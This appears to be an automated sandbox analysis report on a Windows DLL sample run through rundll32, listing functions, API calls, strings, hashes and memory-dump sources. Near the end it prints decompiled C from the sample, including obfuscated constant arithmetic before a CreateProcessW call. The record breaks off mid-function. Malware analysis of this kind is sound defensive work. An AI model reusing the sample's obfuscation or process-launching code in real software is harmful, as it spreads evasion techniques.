Opcode ID: 881dab041e3bbeb12669585d2245f9f733c947e7b4346baf9fdf1d24b9446772
Instruction ID: 6bd069388c6171f02ba272b8da1021ae960e9c546aca6bc9ba05e5d717061796
Opcode Fuzzy Hash: 881dab041e3bbeb12669585d2245f9f733c947e7b4346baf9fdf1d24b9446772
Instruction Fuzzy Hash: 6E117C71814784DED720CFB9C804B8BBBF8EB19A14F008A5EE459D7B81D775A508CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C7FF4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E4C7876,00000001,00000004,6E4B224A,00000000,?,6E4B1D57,6E5014C0,6E4B5700,6E5014C4,?,6E4B224A,00000004,00000001), ref: 6E4C8078

Strings

ios_base::failbit set, xrefs: 6E4C7FF7
;\Ln, xrefs: 6E4C8014, 6E4C805E

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ;\Ln$ios_base::failbit set
API String ID: 1452528299-315570376
Opcode ID: ca902cba45bb4682a5152c04115b1efdd2b8cb57e3b42acb3988e1797d55e9e4
Instruction ID: 14606556618f8b12f3d424fd80a8fdcf08d853ac632752e1f76c1652f66d04c1
Opcode Fuzzy Hash: ca902cba45bb4682a5152c04115b1efdd2b8cb57e3b42acb3988e1797d55e9e4
Instruction Fuzzy Hash: 6611AC3A24422AAFCF126FB6DC44D5EB765BF4DB60F02403AF91597211DB70A811CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C81F2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E4B8BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E4FD6E8), ref: 6E4B8BC5
Part of subcall function 6E4B8BC0: GetLastError.KERNEL32(?,00000000,00000000,?,6E4FD6E8), ref: 6E4B8BCF

IsDebuggerPresent.KERNEL32(?,?,?,6E4B11DF), ref: 6E4C8225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E4B11DF), ref: 6E4C8234

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E4C822F
Nn, xrefs: 6E4C8215

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: Nn$ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-2848728407
Opcode ID: 72f89cc82c9e9e904d9653c2fcbdc097db20473eb47ff1231c9d998f7b107c8d
Instruction ID: 926f72ffa8f24b26d36afb5af2939200856d9e7a58af01240d3454603cce94eb
Opcode Fuzzy Hash: 72f89cc82c9e9e904d9653c2fcbdc097db20473eb47ff1231c9d998f7b107c8d
Instruction Fuzzy Hash: A7E06D70504B018BD7709FF4D118B427BE4AB49749F008C2EE496C7B05EB70E0488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E4DA642

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 7239d12048a2a8a6fc54c5aadcf7f2ac161c7b976b79cfab3ab8bfd067b0dd7b
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 20B15972D452469FE701CFB8C860FAEBBB4EF05354F14426BE8509B381D338894AD791

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
CloseClipboard.USER32 ref: 6E4B5A73
GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30
IsSystemResumeAutomatic.KERNEL32 ref: 6E4B5BA0

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 48ff5c27a146dce0b01913d80dc64f45cea00aa0bb6f9c93b0d42f4c56620cad
Instruction ID: d1f9251fba6a77c004ce313b94ea2f443768c0770f9df7a03b46cb49b64c41bf
Opcode Fuzzy Hash: 48ff5c27a146dce0b01913d80dc64f45cea00aa0bb6f9c93b0d42f4c56620cad
Instruction Fuzzy Hash: 0441D831914B424AC303DEB5D49091BF7EBBFEF680F549B1FE441B6252EB348885C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E4B8FE1

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 68cfd888deb116980a8422af90b2981b4a6ec869c5c5a9c7cca465395c69d0a8
Instruction ID: 820863be63cfdd558d810d227d933c2b9c2be15c63c63589e886fb61abeb224f
Opcode Fuzzy Hash: 68cfd888deb116980a8422af90b2981b4a6ec869c5c5a9c7cca465395c69d0a8
Instruction Fuzzy Hash: 2231E632A083165B9B08CDBDE49596ABBE5EF553B0710826FEC15C7348EB32D950C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(FFFFFFFF,00000000,?,00000002,00000000,00000000,00000000,00000000,?,FFFFFFFF,00000001,00000002,?,00000001,00000000,?), ref: 6E4DF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E4DF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E4DF412
__freea.LIBCMT ref: 6E4DF41B

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 1ecb60de2ba9acb32c5ab41e94a3872238573d209de1149e0a8b7682f90b970d
Instruction ID: aa7f467e2afd8bc3b793a2c6509724b806e4ade04ed24b09413298b4b2f0e89c
Opcode Fuzzy Hash: 1ecb60de2ba9acb32c5ab41e94a3872238573d209de1149e0a8b7682f90b970d
Instruction Fuzzy Hash: 1631F232A0221AAFDF258FB5DC64DEE3BA9EF40714F15412AEC14DB240E735D959CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E4B8ECE
SysAllocString.OLEAUT32(?), ref: 6E4B8F39
_com_issue_error.COMSUPP ref: 6E4B8F75
_com_issue_error.COMSUPP ref: 6E4B8F7F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 250c519bff54429de9af6fadf4074314b8cd91b785af0a3e60896784c7f809be
Instruction ID: 4b4c64dd60303fcc59e6580ddbd817bd369d3d6e488dcebc5287f0fef860e81a
Opcode Fuzzy Hash: 250c519bff54429de9af6fadf4074314b8cd91b785af0a3e60896784c7f809be
Instruction Fuzzy Hash: 49319CB1A00717DBE7609FB9C840F46B7E8EF09B64F21462BE824E7380D774E44187A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E4B8DC0
_com_issue_error.COMSUPP ref: 6E4B8DFC
_com_issue_error.COMSUPP ref: 6E4B8E06
SysFreeString.OLEAUT32(-00000001), ref: 6E4B8E34

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 51765fe99c29d0ab798b176e91ad90096da1859cad9661810f717782ae7967bd
Instruction ID: 9d5bfa9341ab4b321b46121c660ccaffa33000ccf36370db3daa979e6a4d537c
Opcode Fuzzy Hash: 51765fe99c29d0ab798b176e91ad90096da1859cad9661810f717782ae7967bd
Instruction Fuzzy Hash: 0F31AFB19007169BD7209FA9D804F86FBE8EB45B24F10462FE864E7380EBB5A44087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C32C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E4FFAA4), ref: 6E4C32CC
GetCurrentThreadId.KERNEL32 ref: 6E4C32DC
LeaveCriticalSection.KERNEL32(6E4FFAA4), ref: 6E4C330C
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6E4C335F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 65bd32962797d7545d8200617223cc42329f633402f38db631bf3475f740c367
Instruction ID: 9d5ded7287df7c85d3f006454ccc4729d93c28e23ce3bc24ac736ee5a5391526
Opcode Fuzzy Hash: 65bd32962797d7545d8200617223cc42329f633402f38db631bf3475f740c367
Instruction Fuzzy Hash: E221F63AA04616AF8B109FF6E848E1B7B69FF85F60304445BE815C7710DF30E812CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B90C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E4B90C7
VariantCopy.OLEAUT32(?,?), ref: 6E4B90D1
_com_issue_error.COMSUPP ref: 6E4B90E3
VariantClear.OLEAUT32 ref: 6E4B90F1

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 76e29fa2a9c41e3e8f01e622f935507d6946716ada09280879ea4f929ba3d3cf
Instruction ID: 4268b081192ebff035574772ad8c317b66c1d2b3c9e3aff9cb01548350f44d3c
Opcode Fuzzy Hash: 76e29fa2a9c41e3e8f01e622f935507d6946716ada09280879ea4f929ba3d3cf
Instruction Fuzzy Hash: 29D05E72A00A2A6B9E213BF5AC0CCCBBA1CEF067A53004426F700C2101CB76E900C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D74CC: _free.LIBCMT ref: 6E4D74EC

_free.LIBCMT ref: 6E4D7482

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4D7495
_free.LIBCMT ref: 6E4D74A6
_free.LIBCMT ref: 6E4D74B7

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 02e5ba7069621c76e9bdada1a348e8d3ae3e552dc1a8880ea1af83909311cf4e
Instruction ID: 7e16f112ece47866df0b3a3860c312dcfbbe4f3d15a8c2e7e6839d7151d0071b
Opcode Fuzzy Hash: 02e5ba7069621c76e9bdada1a348e8d3ae3e552dc1a8880ea1af83909311cf4e
Instruction Fuzzy Hash: 56F01C70C10E517B9B026FA69B28CDA3B6CEB1661D342050FF50896211DFB2061D8BC2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BBC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,2B098C7C,00000000,?), ref: 6E4BBCDE

Strings

\PerfmonBar\config.xml, xrefs: 6E4BBD92

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: 493037e4a0079f000066ffc17364235252c176be242eee1a3535ca54b859f2ef
Instruction ID: 4f083e8fcefc853d116541cfe64f014ea5e97768256925a05de6b9524a8957f5
Opcode Fuzzy Hash: 493037e4a0079f000066ffc17364235252c176be242eee1a3535ca54b859f2ef
Instruction Fuzzy Hash: 7D71B371D106589FDB20CFA4CD84F9EB7B4FB48714F10469AE919A7380DB70AA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E4E5866,?,00000050,?,?,?,?,?), ref: 6E4E56E6

Strings

ACP, xrefs: 6E4E5629
OCP, xrefs: 6E4E565F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 42ce4bfbb0041d23414c2a07577936daa940e1cc6d2390867dc6a9418d9bdf6a
Instruction ID: 9b0e5dd75600e3a82c39487b39794cb479e01530a10b712413b2da3187fbe9ae
Opcode Fuzzy Hash: 42ce4bfbb0041d23414c2a07577936daa940e1cc6d2390867dc6a9418d9bdf6a
Instruction Fuzzy Hash: F5213862A54101AAE3948BF5C900F8B736A9BC4B22F124817E90DC7B04FB36DE01C390

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE3A1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,6E4DC243,?,?,00000004), ref: 6E4DE3EC

Strings

;\Ln, xrefs: 6E4DE3DC
InitializeCriticalSectionEx, xrefs: 6E4DE3B2, 6E4DE3BC

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: ;\Ln$InitializeCriticalSectionEx
API String ID: 2593887523-1782081328
Opcode ID: bd5c16858d43ab1894c5f39d23086023a33d1c473188d6b5e3858b1e97072fbc
Instruction ID: c4de07480f2689054e5f219445a76f0def3a20992a6df9b06f508b0eb93ff123
Opcode Fuzzy Hash: bd5c16858d43ab1894c5f39d23086023a33d1c473188d6b5e3858b1e97072fbc
Instruction Fuzzy Hash: 3EF09071900658FBCF116FB1DC14DAEBFA5EF45B61B40415AFC052A311CB324A269A80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE1F3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 6E4DE232

Strings

FlsFree, xrefs: 6E4DE204, 6E4DE20E
;\Ln, xrefs: 6E4DE228

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Free
String ID: ;\Ln$FlsFree
API String ID: 3978063606-722890405
Opcode ID: 9d8bdf658ea8087f1faa5c24ef4761df272c30d78bf00d928514f48f69b88c47
Instruction ID: 360371c494def34fa93445e1170ab72a56c076f9545feef1e374704c6a8066c6
Opcode Fuzzy Hash: 9d8bdf658ea8087f1faa5c24ef4761df272c30d78bf00d928514f48f69b88c47
Instruction Fuzzy Hash: B2E0E5B2A01618EBCB116BF59C14DAEBB94DB96A15B00015EFC066F305CA214E068AC6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE19D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 6E4DE1DC

Strings

FlsAlloc, xrefs: 6E4DE1AE, 6E4DE1B8
;\Ln, xrefs: 6E4DE1D2

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: ;\Ln$FlsAlloc
API String ID: 2773662609-1475785183
Opcode ID: 933cbbb03d0b36bf6ca342a9020994d1534a83b8311275f644d47e652b007a0f
Instruction ID: 06673217369f43e479f19154e7d4dc7eb3ba5c150e625175a497d703b94439a7
Opcode Fuzzy Hash: 933cbbb03d0b36bf6ca342a9020994d1534a83b8311275f644d47e652b007a0f
Instruction Fuzzy Hash: 48E05570E00518EB87127BF19C20D6EFB98CF86B11B00015BFC062B302DE326E1A85D6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CC302, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 6E4CC317

Strings

;\Ln, xrefs: 6E4CC32A
FlsAlloc, xrefs: 6E4CC310

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: ;\Ln$FlsAlloc
API String ID: 2742660187-1475785183
Opcode ID: 077c0ba5ff123f507eab15f386e72b59b62f78ec726e760e85bbdd741b89bf26
Instruction ID: 6f13e9bba1883b1ce80a900bcb4a141b279279f721aff85c1502e9c510883308
Opcode Fuzzy Hash: 077c0ba5ff123f507eab15f386e72b59b62f78ec726e760e85bbdd741b89bf26
Instruction Fuzzy Hash: F9D01231D45675A3C56136F57C04EA9BF449B019A3F044173E9186E7169552581186D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,03555F18), ref: 6E4DEB49
GetLastError.KERNEL32 ref: 6E4DEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E4DEBB2

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 49db07cb478fd7ea581657a49201a7ef97dc3ac21bafe203e30da83fb0341e36
Instruction ID: ed646e64a1fab275718bb034c0ed2126f3dede963be5117570b858870d9b8b97
Opcode Fuzzy Hash: 49db07cb478fd7ea581657a49201a7ef97dc3ac21bafe203e30da83fb0341e36
Instruction Fuzzy Hash: 98412930E04606AFCB21CFF9C8E4FAABBB4EF01714F11055BE96597295D731A949CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6468 Parent PID: 6492 rundll32.exeCOMMON

Executed Functions

Function 00F031D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F031D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00F02523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00EE2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x00f031da
0x00f031df
0x00f031e1
0x00f031e4
0x00f031e7
0x00f031e8
0x00f031e9
0x00f031ec
0x00f031ef
0x00f031f2
0x00f031f3
0x00f031f4
0x00f031f7
0x00f031fa
0x00f031fd
0x00f031fe
0x00f03200
0x00f03205
0x00f0320f
0x00f03214
0x00f0321b
0x00f0321f
0x00f03223
0x00f0322a
0x00f03231
0x00f03235
0x00f03241
0x00f03249
0x00f0324c
0x00f03253
0x00f0325a
0x00f0325e
0x00f03265
0x00f0326c
0x00f03273
0x00f0327a
0x00f03281
0x00f032a1
0x00f032bb
0x00f032c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00F032BB

Memory Dump Source

Source File: 00000003.00000002.726592167.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: f1ec5e20bebd011c9382fc477e1b08472e9101242ed5ab9865f677d37d588658
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 79310572801249BBCF65DF96CD09CDFBFB5FB89704F108188F91466220D3B58A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EE4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
